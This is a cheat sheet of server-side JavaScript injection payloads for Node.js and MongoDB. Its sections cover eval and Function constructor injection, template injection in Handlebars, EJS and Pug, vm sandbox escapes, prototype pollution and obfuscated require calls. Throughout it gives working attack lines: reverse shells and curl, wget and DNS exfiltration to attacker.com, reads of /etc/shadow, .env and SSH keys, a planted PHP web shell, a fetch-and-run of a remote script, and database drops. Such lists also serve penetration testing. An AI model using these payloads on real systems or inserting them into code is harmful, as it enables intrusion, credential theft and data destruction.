# Server-Side JavaScript Injection (SSJI) Payloads

# ============================================
# 1. BASIC eval() INJECTION
# ============================================

# Simple expressions
2+2
Math.random()
Date.now()
JSON.stringify({})

# Information disclosure
process.version
process.platform
process.arch
process.pid
process.cwd()
process.env
global
this

# File system access
require('fs').readFileSync('/etc/passwd', 'utf8')
require('fs').readFileSync('/etc/shadow', 'utf8')
require('fs').readFileSync('/proc/self/environ', 'utf8')
require('fs').readdirSync('/').toString()
require('fs').readdirSync('/home').toString()
require('fs').readFileSync('package.json', 'utf8')
require('fs').readFileSync('.env', 'utf8')

# ============================================
# 2. REMOTE CODE EXECUTION (RCE)
# ============================================

# Basic command execution
require('child_process').execSync('whoami').toString()
require('child_process').execSync('id').toString()
require('child_process').execSync('pwd').toString()
require('child_process').execSync('ls -la').toString()
require('child_process').execSync('cat /etc/passwd').toString()
require('child_process').execSync('uname -a').toString()

# Reverse shell
require('child_process').exec('bash -i >& /dev/tcp/attacker.com/4444 0>&1')
require('child_process').exec('nc -e /bin/bash attacker.com 4444')
require('child_process').spawn('nc', ['-e', '/bin/bash', 'attacker.com', '4444'])

# Data exfiltration
require('child_process').execSync('curl attacker.com/?data=$(cat /etc/passwd|base64)').toString()
require('child_process').execSync('wget --post-file=/etc/passwd attacker.com').toString()

# Write backdoor
require('fs').writeFileSync('/tmp/backdoor.js', 'malicious code')
require('fs').writeFileSync('shell.php', '<?php system($_GET["cmd"]); ?>')

# ============================================
# 3. FUNCTION CONSTRUCTOR INJECTION
# ============================================

# Basic Function constructor
new Function('return 2+2')()
new Function('return process.version')()
new Function('return require("os").userInfo()')()

# RCE via Function constructor
new Function('return require("child_process").execSync("whoami").toString()')()
new Function('return global.process.mainModule.require("child_process").execSync("id").toString()')()

# ============================================
# 4. MONGODB $where INJECTION
# ============================================

# Basic MongoDB injection
admin' || '1'=='1
' || true || '
' || '1'=='1' || '
'; return true; //
admin'; return true; //

# MongoDB data exfiltration
'; return this.password.match(/^a/); //
'; return this.email.includes("admin"); //
'; return this.role == "admin"; //

# MongoDB enumeration
'; var users = db.users.find(); return true; //
'; db.users.find().forEach(function(u){print(u)}); return true; //

# MongoDB command execution (only where the $where runtime exposes a Node-style require; stock mongod's server-side JS engine does not, so these usually fail)
'; require('child_process').execSync('whoami'); return true; //
'; var fs = require('fs'); fs.readFileSync('/etc/passwd'); return true; //

# MongoDB DoS
'; while(true){}; //
'; db.users.drop(); return true; //
'; db.dropDatabase(); return true; //

# ============================================
# 5. TEMPLATE INJECTION (HANDLEBARS)
# ============================================

# Handlebars RCE
{{#with "s" as |string|}}
  {{#with "e"}}
    {{#with split as |conslist|}}
      {{this.pop}}
      {{this.push (lookup string.sub "constructor")}}
      {{this.pop}}
      {{#with string.split as |codelist|}}
        {{this.pop}}
        {{this.push "return require('child_process').execSync('whoami');"}}
        {{this.pop}}
        {{#each conslist}}
          {{#with (string.sub.apply 0 codelist)}}
            {{this}}
          {{/with}}
        {{/each}}
      {{/with}}
    {{/with}}
  {{/with}}
{{/with}}

# Simplified Handlebars payload
{{this}}
{{this.constructor}}
{{this.constructor.constructor}}

# ============================================
# 6. EJS TEMPLATE INJECTION
# ============================================

<%= global.process.mainModule.require('child_process').execSync('whoami') %>
<%= require('child_process').execSync('cat /etc/passwd').toString() %>
<%= global.process.mainModule.require('fs').readFileSync('/etc/passwd', 'utf8') %>
<%= process.env %>
<%= JSON.stringify(process.env) %>

# ============================================
# 7. PUG/JADE TEMPLATE INJECTION
# ============================================

#{global.process.mainModule.require('child_process').execSync('id')}
#{function(){return require('child_process').execSync('whoami')}()}
#{require('child_process').execSync('cat /etc/passwd').toString()}
- var x = global.process.mainModule.require('child_process').execSync('ls').toString()
= x

# ============================================
# 8. VM SANDBOX ESCAPE
# ============================================

# Constructor chain escape
this.constructor.constructor('return process')()
this.constructor.constructor('return global')()
({}).constructor.constructor('return this')()

# Process access
this.constructor.constructor('return process')().mainModule.require('child_process').execSync('whoami').toString()
(function(){return this.constructor.constructor('return process')()})()
({}).constructor.constructor('return global.process.mainModule.require("child_process").execSync("id").toString()')()

# Alternative escapes
(function(){return this})().constructor.constructor('return process')()
arguments.callee.caller.constructor('return process')()

# ============================================
# 9. PROTOTYPE POLLUTION TO RCE
# ============================================

# Prototype pollution
{"__proto__": {"isAdmin": true}}
{"__proto__": {"polluted": "yes"}}
{"constructor": {"prototype": {"isAdmin": true}}}

# Pollution leading to RCE (the polluted value is an inert string until application code later passes it to an eval-style sink)
{"__proto__": {"toString": "require('child_process').execSync('whoami').toString()"}}
{"__proto__": {"valueOf": "require('child_process').execSync('id')"}}

# ============================================
# 10. SETTIMEOUT/SETINTERVAL INJECTION (only for sinks that evaluate a string callback; Node's built-in timers accept functions, not strings)
# ============================================

require('child_process').exec('curl attacker.com/?data=$(whoami)')
require('fs').writeFileSync('/tmp/pwned', 'hacked')
require('child_process').execSync('nc attacker.com 4444 -e /bin/bash')
global.process.exit(1)

# ============================================
# 11. REQUIRE VARIATIONS
# ============================================

# Direct require
require('child_process')
require('fs')
require('net')
require('http')

# Global require
global.require('child_process')
global.process.mainModule.require('child_process')

# Module constructor
process.mainModule.constructor._load('child_process')
global.process.mainModule.constructor._load('fs')

# ============================================
# 12. ENVIRONMENT VARIABLE EXFILTRATION
# ============================================

process.env
JSON.stringify(process.env)
process.env.PATH
process.env.HOME
process.env.USER
process.env.SECRET_KEY
process.env.DATABASE_URL
process.env.API_KEY

# ============================================
# 13. FILE READ VARIATIONS
# ============================================

# Read sensitive files
require('fs').readFileSync('/etc/passwd', 'utf8')
require('fs').readFileSync('/etc/shadow', 'utf8')
require('fs').readFileSync('/etc/hosts', 'utf8')
require('fs').readFileSync('/proc/self/environ', 'utf8')
require('fs').readFileSync('/home/user/.ssh/id_rsa', 'utf8')
require('fs').readFileSync('config/database.yml', 'utf8')
require('fs').readFileSync('.env', 'utf8')
require('fs').readFileSync('package.json', 'utf8')

# Directory listing
require('fs').readdirSync('/').toString()
require('fs').readdirSync('/etc').toString()
require('fs').readdirSync('/home').toString()
require('fs').readdirSync('.').toString()

# ============================================
# 14. COMMAND INJECTION VIA CHILD_PROCESS
# ============================================

# exec variations
require('child_process').exec('cat /etc/passwd', (e,o)=>console.log(o))
require('child_process').execSync('whoami').toString()
require('child_process').execFileSync('ls', ['-la']).toString()

# spawn variations
require('child_process').spawn('cat', ['/etc/passwd'])
require('child_process').spawnSync('id').stdout.toString()

# ============================================
# 15. NETWORK OPERATIONS
# ============================================

# HTTP request
require('http').get('http://attacker.com/?data=exfiltrated')
require('https').get('https://attacker.com/?data=' + process.env.SECRET)

# DNS exfiltration
require('dns').resolve4(process.env.SECRET + '.attacker.com')

# Socket connection
require('net').connect(4444, 'attacker.com')

# ============================================
# 16. PROCESS MANIPULATION
# ============================================

process.exit(1)
process.kill(process.pid)
process.chdir('/')
process.binding('spawn_sync')

# ============================================
# 17. CRYPTO MODULE ACCESS
# ============================================

require('crypto').randomBytes(16).toString('hex')
require('crypto').getHashes()
require('crypto').getCiphers()

# ============================================
# 18. OS MODULE ACCESS
# ============================================

require('os').userInfo()
require('os').hostname()
require('os').platform()
require('os').arch()
require('os').cpus()
require('os').networkInterfaces()
require('os').tmpdir()
require('os').homedir()

# ============================================
# 19. PATH MODULE FOR TRAVERSAL
# ============================================

require('path').resolve('/etc/passwd')
require('path').join(__dirname, '../../../etc/passwd')

# ============================================
# 20. MONGODB SPECIFIC INJECTIONS
# ============================================

# $function aggregation (MongoDB 4.4+)
{$function: {
  body: function() { return require('child_process').execSync('whoami').toString(); },
  args: [],
  lang: "js"
}}

# mapReduce injection
{
  map: function() { require('child_process').exec('curl attacker.com/?data=pwned'); emit(this._id, 1); },
  reduce: function(k, v) { return Array.sum(v); }
}

# ============================================
# 21. EXPRESS SPECIFIC
# ============================================

# res.render with unsafe data
<%= user.input %>
#{user.input}
{{user.input}}

# ============================================
# 22. WEBPACK/BUNDLER SPECIFIC
# ============================================

__webpack_require__
__non_webpack_require__

# ============================================
# 23. ELECTRON SPECIFIC
# ============================================

require('electron').remote.require('child_process')
require('electron').ipcRenderer.send('exploit')

# ============================================
# 24. OBFUSCATED PAYLOADS
# ============================================

# String concatenation
req+'uire'('child_'+'process').exec('whoami')

# Unicode escaping
require('\u0063\u0068\u0069\u006c\u0064\u005f\u0070\u0072\u006f\u0063\u0065\u0073\u0073')

# Hex encoding
require(Buffer.from('6368696c645f70726f63657373', 'hex').toString())

# Base64
require(Buffer.from('Y2hpbGRfcHJvY2Vzcw==', 'base64').toString())

# Computed property access
global['pro'+'cess'].mainModule['req'+'uire']('child_process')

# ============================================
# 25. NESTING AND CHAINING
# ============================================

require('child_process').exec('wget http://attacker.com/shell.sh -O /tmp/s.sh && bash /tmp/s.sh')
require('child_process').execSync('curl attacker.com/$(cat /etc/passwd | base64)').toString()

# ============================================
# 26. TIME-BASED BLIND SSJI
# ============================================

require('child_process').execSync('sleep 5')
setTimeout(function(){}, 5000)
require('child_process').execSync('ping -c 5 attacker.com')

# ============================================
# 27. OUT-OF-BAND DATA EXFILTRATION
# ============================================

require('child_process').execSync('curl attacker.com -d "$(cat /etc/passwd)"')
require('child_process').execSync('wget --post-data="$(env)" attacker.com')
require('child_process').execSync('nslookup $(whoami).attacker.com')

# ============================================
# 28. WRITESTREAM FOR PERSISTENCE
# ============================================

require('fs').createWriteStream('/tmp/backdoor.js').write('malicious code')

# ============================================
# 29. REGEX DOS (ReDoS) via SSJI
# ============================================

/(a+)+b/.test('aaaaaaaaaaaaaaaaaaaaaa!')
/(a|a)*b/.test('aaaaaaaaaaaaaaaaaaaaaa!')

# ============================================
# 30. TESTING PAYLOADS
# ============================================

# Detection payloads
throw new Error('SSJI Test')
console.log('SSJI_TEST_' + Date.now())
require('fs').writeFileSync('/tmp/ssji_test_' + Date.now(), 'test')

# Simple arithmetic to confirm execution
7*7
Math.sqrt(16)
[1,2,3].join(',')
